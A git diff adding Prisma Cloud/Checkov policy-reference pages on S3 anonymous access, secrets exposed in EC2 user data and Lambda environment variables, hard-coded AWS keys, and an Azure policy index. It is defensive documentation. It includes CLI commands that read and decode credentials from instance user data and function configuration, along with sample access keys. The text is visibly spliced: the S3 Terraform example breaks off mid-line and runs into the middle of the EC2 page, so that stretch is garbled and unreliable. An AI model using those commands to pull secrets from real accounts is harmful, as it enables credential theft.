+|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== +//// + + +=== Description + + +The Principal element specifies the user, account, service, or other entity that is allowed or denied access to a resource. +In Amazon S3, a Principal is the account or user who is allowed access to the actions and resources in the statement. +When added to a bucket policy, the principal is the user, account, service, or other entity that is the recipient of this permission. +When you set the wildcard ("*") as the Principal value, you essentially grant permission to everyone. +This is referred to as anonymous access. +The following statements are all considered Anonymous Permissions.
+ +[source,shell] +---- +## Example 1 +"Principal":"*" + +## Example 2 +"Principal":{"AWS":"*"} + +## Example 3 +"Principal":{"AWS":["*", ...]} +---- + + +When you grant anonymous access, anyone in the world can access your bucket. +It is highly recommended to *never* grant any kind of anonymous write access to your S3 bucket. + +//// +=== Fix - Runtime + + +*AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/s3/[Amazon S3 console]. + +. Select the *Permissions* tab, then select *Bucket Policy*. + +. Remove policies for s3:List* actions for principals '*'. ++ +If necessary, modify the policy instead to limit access to specific principals. +//// + +=== Fix - Buildtime + + +*Terraform* + + + +[source,go] +---- +resource "aws_s3_bucket" "bucket" { + bucket = "bucket" + + policy = < +--instance-id <INSTANCE_ID> +--query UserData.Value +--output text > encodeddata; base64 +--decode encodeddata +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_instance +* *Argument:* user_data + +In this case, the analysis has found a likely AWS secret being used in your user_data. +Remove these secrets and substitute them with dynamic values (for example, obtained from Vault), or use instance profiles. + + +[source,go] +---- +resource "aws_instance" "web" { + ... + instance_type = "t3.micro" +- user_data = "access_key=123456ABCDEFGHIJZTLA and secret_key=AAAaa+Aa4AAaAA6aAkA0Ad+Aa8aA1aaaAAAaAaA" +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::EC2::Instance +* *Argument:* Properties.UserData + + +[source,yaml] +---- +Resources: + Instance: + Type: AWS::EC2::Instance + Properties: + ... +- UserData: "..."
+---- diff --git a/code-security/policy-reference/aws-policies/secrets-policies/bc-aws-secrets-3.adoc b/code-security/policy-reference/aws-policies/secrets-policies/bc-aws-secrets-3.adoc new file mode 100644 index 000000000..3eca5bd16 --- /dev/null +++ b/code-security/policy-reference/aws-policies/secrets-policies/bc-aws-secrets-3.adoc @@ -0,0 +1,102 @@ +== Lambda function's environment variables expose secrets + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 437d3791-e184-445c-8487-615267f8af83 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py[CKV_AWS_45] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +A function's metadata includes environment variable fields that contain small configurations that help the function execute. +These variables can be accessed by any entity with the most basic read-metadata-only permissions, and cannot be encrypted. +The Lambda runtime makes environment variables available to your code, so secrets placed there are effectively exposed. +We recommend you remove secrets from unencrypted places, especially if they can be easily accessed, to reduce the risk of exposing data to third parties. + +//// +=== Fix - Runtime + + +*CLI Command* + + +To see the secrets, run the following CLI command: + + +[source,shell] +---- +aws lambda get-function-configuration +--region <REGION> +--function-name <FUNCTION_NAME> +--query Environment.Variables +---- +//// + +=== Fix - Buildtime + + +*CloudFormation* + + +* *Resource:* AWS::Lambda::Function +* *Arguments:* Properties.Environment.Variables + + +[source,yaml] +---- +Type: AWS::Lambda::Function + Properties: + ...
+ Environment: + Variables: + key1: not_a_secret +- key2: secret +---- + +*Terraform* + + +* *Resource:* aws_lambda_function +* *Arguments:* environment block, variables attribute + + +[source,go] +---- +resource "aws_lambda_function" "fail" { + function_name = "test-env" + role = "" + runtime = "python3.8" + + environment { + variables = { +- AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE", +- AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY", +- AWS_DEFAULT_REGION = "us-west-2" + } + } +} +---- + +In this case, the credentials would be better provided by attaching permissions to the function's IAM role. diff --git a/code-security/policy-reference/aws-policies/secrets-policies/bc-aws-secrets-5.adoc b/code-security/policy-reference/aws-policies/secrets-policies/bc-aws-secrets-5.adoc new file mode 100644 index 000000000..171009b84 --- /dev/null +++ b/code-security/policy-reference/aws-policies/secrets-policies/bc-aws-secrets-5.adoc @@ -0,0 +1,88 @@ +== AWS access keys and secrets are hard coded in infrastructure + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4cda0308-4a5b-47bb-ad2c-2029c0c01171 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/provider/aws/credentials.py[CKV_AWS_41] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,Serverless,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +*AWS access keys and secrets are hard coded in infrastructure* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4cda0308-4a5b-47bb-ad2c-2029c0c01171 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/provider/aws/credentials.py[CKV_AWS_41] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,Serverless,TerraformPlan + +|=== +//// + + +=== Description + + +When accessing AWS programmatically, users can choose to use an access key to verify their identity, and the identity of their
applications. +An access key consists of an access key ID and a secret access key. +Anyone who has your access key has the same level of access to your AWS resources as you do. +We recommend you protect access keys and keep them private. +Specifically, do not store hard coded keys and secrets in infrastructure such as code, or other version-controlled configuration settings. + +=== Fix - Buildtime + + +*Terraform* + + +Do not add secrets to your infrastructure code; obtain AWS credentials outside of it, for example via environment variables. +Remove any reference to access_key and secret_key. + + +[source,go] +---- +provider "aws" { + region = var.region +- access_key = "NOTEXACTLYAKEY" +- secret_key = "NOTACTUALLYASECRET" +} +---- diff --git a/code-security/policy-reference/aws-policies/secrets-policies/secrets-policies.adoc b/code-security/policy-reference/aws-policies/secrets-policies/secrets-policies.adoc new file mode 100644 index 000000000..8a4acd3cd --- /dev/null +++ b/code-security/policy-reference/aws-policies/secrets-policies/secrets-policies.adoc @@ -0,0 +1,24 @@ +== Secrets Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-aws-secrets-1.adoc[EC2 user data exposes secrets] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/EC2Credentials.py[CKV_AWS_46] +|HIGH + + +|xref:bc-aws-secrets-3.adoc[Lambda function's environment variables expose secrets] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py[CKV_AWS_45] +|MEDIUM + + +|xref:bc-aws-secrets-5.adoc[AWS access keys and secrets are hard coded in infrastructure] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/provider/aws/credentials.py[CKV_AWS_41] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/azure-general-policies.adoc
b/code-security/policy-reference/azure-policies/azure-general-policies/azure-general-policies.adoc new file mode 100644 index 000000000..40b3b5d26 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/azure-general-policies.adoc @@ -0,0 +1,438 @@ +== Azure General Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-azr-general-1.adoc[Azure VM data disk is not encrypted with ADE/CMK] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AzureManagedDiscEncryption.py[CKV_AZURE_2] +|HIGH + + +|xref:bc-azr-general-13.adoc[Azure Linux scale set does not use an SSH key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AzureScaleSetPassword.py[CKV_AZURE_49] +|HIGH + + +|xref:bc-azr-general-14.adoc[Virtual Machine extensions are installed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py[CKV_AZURE_50] +|MEDIUM + + +|xref:bc-azr-general-2.adoc[Azure App Service Web app authentication is off] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py[CKV_AZURE_13] +|MEDIUM + + +|xref:bc-azr-general-3.adoc[Azure Microsoft Defender for Cloud security contact phone number is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py[CKV_AZURE_20] +|LOW + + +|xref:bc-azr-general-5.adoc[Azure Microsoft Defender for Cloud email notification for subscription owner is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py[CKV_AZURE_22] +|MEDIUM + + +|xref:bc-azr-general-6.adoc[Azure SQL Server threat detection alerts are not enabled for all threat types] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py[CKV_AZURE_25] +|HIGH + + +|xref:bc-azr-general-7.adoc[Azure SQL server send alerts to field value is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py[CKV_AZURE_26] +|HIGH + + +|xref:bc-azr-general-8.adoc[Azure SQL Databases with disabled Email service and co-administrators for Threat Detection] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py[CKV_AZURE_27] +|MEDIUM + + +|xref:ensure-allow-access-to-azure-services-for-postgresql-database-server-is-disabled.adoc[Azure PostgreSQL Database Server 'Allow access to Azure services' enabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml[CKV2_AZURE_6] +|MEDIUM + + +|xref:ensure-azure-built-in-logging-for-azure-function-app-is-enabled.adoc[Azure Built-in logging for Azure function app is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py[CKV_AZURE_159] +|LOW + + +|xref:ensure-azure-client-certificates-are-enforced-for-api-management.adoc[Azure Client Certificates are not enforced for API management] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py[CKV_AZURE_152] +|LOW + + +|xref:ensure-azure-cognitive-services-enables-customer-managed-keys-cmks-for-encryption.adoc[Azure Cognitive Services does not use Customer Managed Keys (CMKs) for encryption] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml[CKV2_AZURE_22] +|LOW + + 
+|xref:ensure-azure-data-exfiltration-protection-for-azure-synapse-workspace-is-enabled.adoc[Azure Data exfiltration protection for Azure Synapse workspace is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py[CKV_AZURE_157] +|LOW + + +|xref:ensure-azure-machine-learning-compute-cluster-minimum-nodes-is-set-to-0.adoc[Azure Machine Learning Compute Cluster Minimum Nodes is not set to 0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py[CKV_AZURE_150] +|LOW + + +|xref:ensure-azure-postgresql-flexible-server-enables-geo-redundant-backups.adoc[Azure PostgreSQL Flexible Server does not enable geo-redundant backups] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py[CKV_AZURE_136] +|LOW + + +|xref:ensure-azure-resources-that-support-tags-have-tags.adoc[Azure resources that support tags do not have tags] +|CKV_AZURE_CUSTOM_1 +|LOW + + +|xref:ensure-azure-sql-server-has-default-auditing-policy-configured.adoc[Azure SQL Server does not have default auditing policy configured] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py[CKV_AZURE_156] +|LOW + + +|xref:ensure-azure-virtual-machine-does-not-enable-password-authentication.adoc[Azure Virtual machine enables password authentication] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py[CKV_AZURE_149] +|LOW + + +|xref:ensure-cognitive-services-account-encryption-cmks-are-enabled.adoc[Storage Account name does not follow naming rules] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountName.py[CKV_AZURE_43] +|LOW + + 
+|xref:ensure-ftp-deployments-are-disabled.adoc[Azure App Services FTP deployment is All allowed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py[CKV_AZURE_78] +|MEDIUM + + +|xref:ensure-mssql-is-using-the-latest-version-of-tls-encryption.adoc[MSSQL is not using the latest version of TLS encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py[CKV_AZURE_52] +|MEDIUM + + +|xref:ensure-mysql-is-using-the-latest-version-of-tls-encryption.adoc[MySQL is not using the latest version of TLS encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py[CKV_AZURE_54] +|MEDIUM + + +|xref:ensure-standard-pricing-tier-is-selected.adoc[Azure Microsoft Defender for Cloud Defender plans is set to Off] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py[CKV_AZURE_19] +|MEDIUM + + +|xref:ensure-storage-for-critical-data-are-encrypted-with-customer-managed-key.adoc[Storage for critical data are not encrypted with Customer Managed Key] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml[CKV2_AZURE_1] +|HIGH + + +|xref:ensure-that-active-directory-is-used-for-service-fabric-authentication.adoc[Active Directory is not used for authentication for Service Fabric] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py[CKV_AZURE_125] +|LOW + + +|xref:ensure-that-app-services-use-azure-files.adoc[App services do not use Azure files] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py[CKV_AZURE_88] +|LOW + + 
+|xref:ensure-that-automatic-os-image-patching-is-enabled-for-virtual-machine-scale-sets.adoc[Automatic OS image patching is disabled for Virtual Machine scale sets] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py[CKV_AZURE_95] +|LOW + + +|xref:ensure-that-automation-account-variables-are-encrypted.adoc[Azure Automation account variables are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AutomationEncrypted.py[CKV_AZURE_73] +|LOW + + +|xref:ensure-that-azure-active-directory-admin-is-configured.adoc[Azure SQL servers which doesn't have Azure Active Directory admin configured] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml[CKV2_AZURE_7] +|LOW + + +|xref:ensure-that-azure-batch-account-uses-key-vault-to-encrypt-data.adoc[Azure Batch account does not use key vault to encrypt data] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py[CKV_AZURE_76] +|LOW + + +|xref:ensure-that-azure-data-explorer-encryption-at-rest-uses-a-customer-managed-key.adoc[Azure Data Explorer encryption at rest does not use a customer-managed key] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml[CKV2_AZURE_11] +|LOW + + +|xref:ensure-that-azure-data-explorer-uses-disk-encryption.adoc[Azure Data Explorer does not use disk encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py[CKV_AZURE_74] +|LOW + + +|xref:ensure-that-azure-data-explorer-uses-double-encryption.adoc[Azure Data Explorer does not use double encryption] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py[CKV_AZURE_75] +|LOW + + +|xref:ensure-that-azure-data-factories-are-encrypted-with-a-customer-managed-key.adoc[Azure data factories are not encrypted with a customer-managed key] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml[CKV2_AZURE_15] +|LOW + + +|xref:ensure-that-azure-data-factory-uses-git-repository-for-source-control.adoc[Azure Data Factory does not use Git repository for source control] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py[CKV_AZURE_103] +|LOW + + +|xref:ensure-that-azure-defender-is-set-to-on-for-app-service.adoc[Azure Microsoft Defender for Cloud is set to Off for App Service] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py[CKV_AZURE_61] +|MEDIUM + + +|xref:ensure-that-azure-defender-is-set-to-on-for-azure-sql-database-servers.adoc[Azure Microsoft Defender for Cloud is set to Off for Azure SQL Databases] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py[CKV_AZURE_69] +|MEDIUM + + +|xref:ensure-that-azure-defender-is-set-to-on-for-container-registries.adoc[Azure Microsoft Defender for Cloud is set to Off for Container Registries] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py[CKV_AZURE_86] +|HIGH + + +|xref:ensure-that-azure-defender-is-set-to-on-for-key-vault.adoc[Azure Microsoft Defender for Cloud is set to Off for Key Vault] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py[CKV_AZURE_87] +|MEDIUM + + 
+|xref:ensure-that-azure-defender-is-set-to-on-for-kubernetes.adoc[Azure Security Center Defender set to Off for Kubernetes] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py[CKV_AZURE_85] +|HIGH + + +|xref:ensure-that-azure-defender-is-set-to-on-for-servers.adoc[Azure Microsoft Defender for Cloud is set to Off for Servers] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py[CKV_AZURE_55] +|MEDIUM + + +|xref:ensure-that-azure-defender-is-set-to-on-for-sql-servers-on-machines.adoc[Azure Microsoft Defender for Cloud is set to Off for SQL servers on machines] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py[CKV_AZURE_79] +|MEDIUM + + +|xref:ensure-that-azure-defender-is-set-to-on-for-storage.adoc[Azure Microsoft Defender for Cloud is set to Off for Storage] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py[CKV_AZURE_84] +|MEDIUM + + +|xref:ensure-that-cors-disallows-every-resource-to-access-app-services.adoc[CORS allows resource to access app services] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py[CKV_AZURE_57] +|LOW + + +|xref:ensure-that-cors-disallows-every-resource-to-access-function-apps.adoc[CORS allows resources to access function apps] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py[CKV_AZURE_62] +|LOW + + +|xref:ensure-that-cosmos-db-accounts-have-customer-managed-keys-to-encrypt-data-at-rest.adoc[Cosmos DB Accounts do not have CMKs encrypting data at rest] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py[CKV_AZURE_100] +|LOW + + 
+|xref:ensure-that-data-lake-store-accounts-enables-encryption.adoc[Unencrypted Data Lake Store accounts] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py[CKV_AZURE_105] +|MEDIUM + + +|xref:ensure-that-function-apps-enables-authentication.adoc[Azure Function App authentication is off] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py[CKV_AZURE_56] +|MEDIUM + + +|xref:ensure-that-http-version-is-the-latest-if-used-to-run-the-function-app.adoc[Azure Function App doesn't use HTTP 2.0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py[CKV_AZURE_67] +|MEDIUM + + +|xref:ensure-that-java-version-is-the-latest-if-used-to-run-the-web-app.adoc[Azure App Service Web app does not use latest Java version] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py[CKV_AZURE_83] +|LOW + + +|xref:ensure-that-key-vault-enables-purge-protection.adoc[Azure Key Vault Purge protection is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py[CKV_AZURE_110] +|MEDIUM + + +|xref:ensure-that-key-vault-enables-soft-delete.adoc[Key vault does not enable soft-delete] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py[CKV_AZURE_111] +|LOW + + +|xref:ensure-that-key-vault-key-is-backed-by-hsm.adoc[Key vault key is not backed by HSM] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py[CKV_AZURE_112] +|LOW + + +|xref:ensure-that-key-vault-secrets-have-content-type-set.adoc[Key vault secrets do not have content_type set] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecretContentType.py[CKV_AZURE_114] +|LOW + + +|xref:ensure-that-managed-disks-use-a-specific-set-of-disk-encryption-sets-for-the-customer-managed-key-encryption.adoc[Managed disks do not use a specific set of disk encryption sets for customer-managed key encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py[CKV_AZURE_93] +|LOW + + +|xref:ensure-that-managed-identity-provider-is-enabled-for-app-services.adoc[Azure App Service Web app does not have a Managed Service Identity] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py[CKV_AZURE_71] +|LOW + + +|xref:ensure-that-mariadb-server-enables-geo-redundant-backups.adoc[MariaDB server does not enable geo-redundant backups] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py[CKV_AZURE_129] +|LOW + + +|xref:ensure-that-microsoft-antimalware-is-configured-to-automatically-updates-for-virtual-machines.adoc[Microsoft Antimalware is not configured to automatically update Virtual Machines] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml[CKV2_AZURE_10] +|LOW + + +|xref:ensure-that-my-sql-server-enables-geo-redundant-backups.adoc[My SQL server disables geo-redundant backups] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py[CKV_AZURE_94] +|LOW + + +|xref:ensure-that-my-sql-server-enables-threat-detection-policy.adoc[My SQL server does not enable Threat Detection policy] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py[CKV_AZURE_127] +|LOW + + 
+|xref:ensure-that-mysql-server-enables-customer-managed-key-for-encryption.adoc[MySQL server does not enable customer-managed key for encryption] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml[CKV2_AZURE_16] +|LOW + + +|xref:ensure-that-net-framework-version-is-the-latest-if-used-as-a-part-of-the-web-app.adoc[Azure App Service Web app doesn't use latest .Net framework version] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py[CKV_AZURE_80] +|LOW + + +|xref:ensure-that-php-version-is-the-latest-if-used-to-run-the-web-app.adoc[Azure App Service Web app does not use latest PHP version] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py[CKV_AZURE_81] +|LOW + + +|xref:ensure-that-postgresql-server-enables-customer-managed-key-for-encryption.adoc[PostgreSQL server does not enable customer-managed key for encryption] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml[CKV2_AZURE_17] +|LOW + + +|xref:ensure-that-postgresql-server-enables-geo-redundant-backups.adoc[PostgreSQL server does not enable geo-redundant backups] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py[CKV_AZURE_102] +|LOW + + +|xref:ensure-that-postgresql-server-enables-infrastructure-encryption-1.adoc[MySQL server disables infrastructure encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLEncryptionEnaled.py[CKV_AZURE_96] +|LOW + + +|xref:ensure-that-postgresql-server-enables-infrastructure-encryption.adoc[PostgreSQL server does not enable infrastructure encryption] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py[CKV_AZURE_130] +|LOW + + +|xref:ensure-that-postgresql-server-enables-threat-detection-policy.adoc[PostgreSQL server does not enable Threat Detection policy] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py[CKV_AZURE_128] +|LOW + + +|xref:ensure-that-python-version-is-the-latest-if-used-to-run-the-web-app.adoc[Azure App Service Web app does not use latest Python version] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py[CKV_AZURE_82] +|LOW + + +|xref:ensure-that-remote-debugging-is-not-enabled-for-app-services.adoc[Azure App Services Remote debugging is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RemoteDebggingNotEnabled.py[CKV_AZURE_72] +|LOW + + +|xref:ensure-that-security-contact-emails-is-set.adoc[Azure Microsoft Defender for Cloud security alert email notifications is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py[CKV_AZURE_131] +|MEDIUM + + +|xref:ensure-that-service-fabric-uses-available-three-levels-of-protection-available.adoc[Service Fabric does not use three levels of protection available] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py[CKV_AZURE_126] +|LOW + + +|xref:ensure-that-sql-servers-enables-data-security-policy.adoc[Azure SQL server Defender setting is set to Off] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml[CKV2_AZURE_13] +|MEDIUM + + +|xref:ensure-that-storage-accounts-use-customer-managed-key-for-encryption.adoc[Azure Storage account 
Encryption CMKs Disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountsUseCustomerManagedKeyForEncryption.yaml[CKV2_AZURE_18] +|LOW + + +|xref:ensure-that-unattached-disks-are-encrypted.adoc[Unattached disks are not encrypted] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml[CKV2_AZURE_14] +|LOW + + +|xref:ensure-that-va-setting-also-send-email-notifications-to-admins-and-subscription-owners-is-set-for-an-sql-server.adoc[Azure SQL Server ADS Vulnerability Assessment (VA) 'Also send email notifications to admins and subscription owners' is disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml[CKV2_AZURE_5] +|LOW + + +|xref:ensure-that-va-setting-periodic-recurring-scans-is-enabled-on-a-sql-server.adoc[Azure SQL Server ADS Vulnerability Assessment (VA) Periodic recurring scans is disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml[CKV2_AZURE_3] +|LOW + + +|xref:ensure-that-va-setting-send-scan-reports-to-is-configured-for-a-sql-server.adoc[Azure SQL Server ADS Vulnerability Assessment (VA) 'Send scan reports to' is not configured] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml[CKV2_AZURE_4] +|LOW + + +|xref:ensure-that-virtual-machine-scale-sets-have-encryption-at-host-enabled.adoc[Virtual machine scale sets do not have encryption at host enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py[CKV_AZURE_97] +|LOW + + +|xref:ensure-that-virtual-machines-are-backed-up-using-azure-backup.adoc[Virtual Machines are not backed up using Azure Backup] +| 
https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml[CKV2_AZURE_12]
+|LOW
+
+
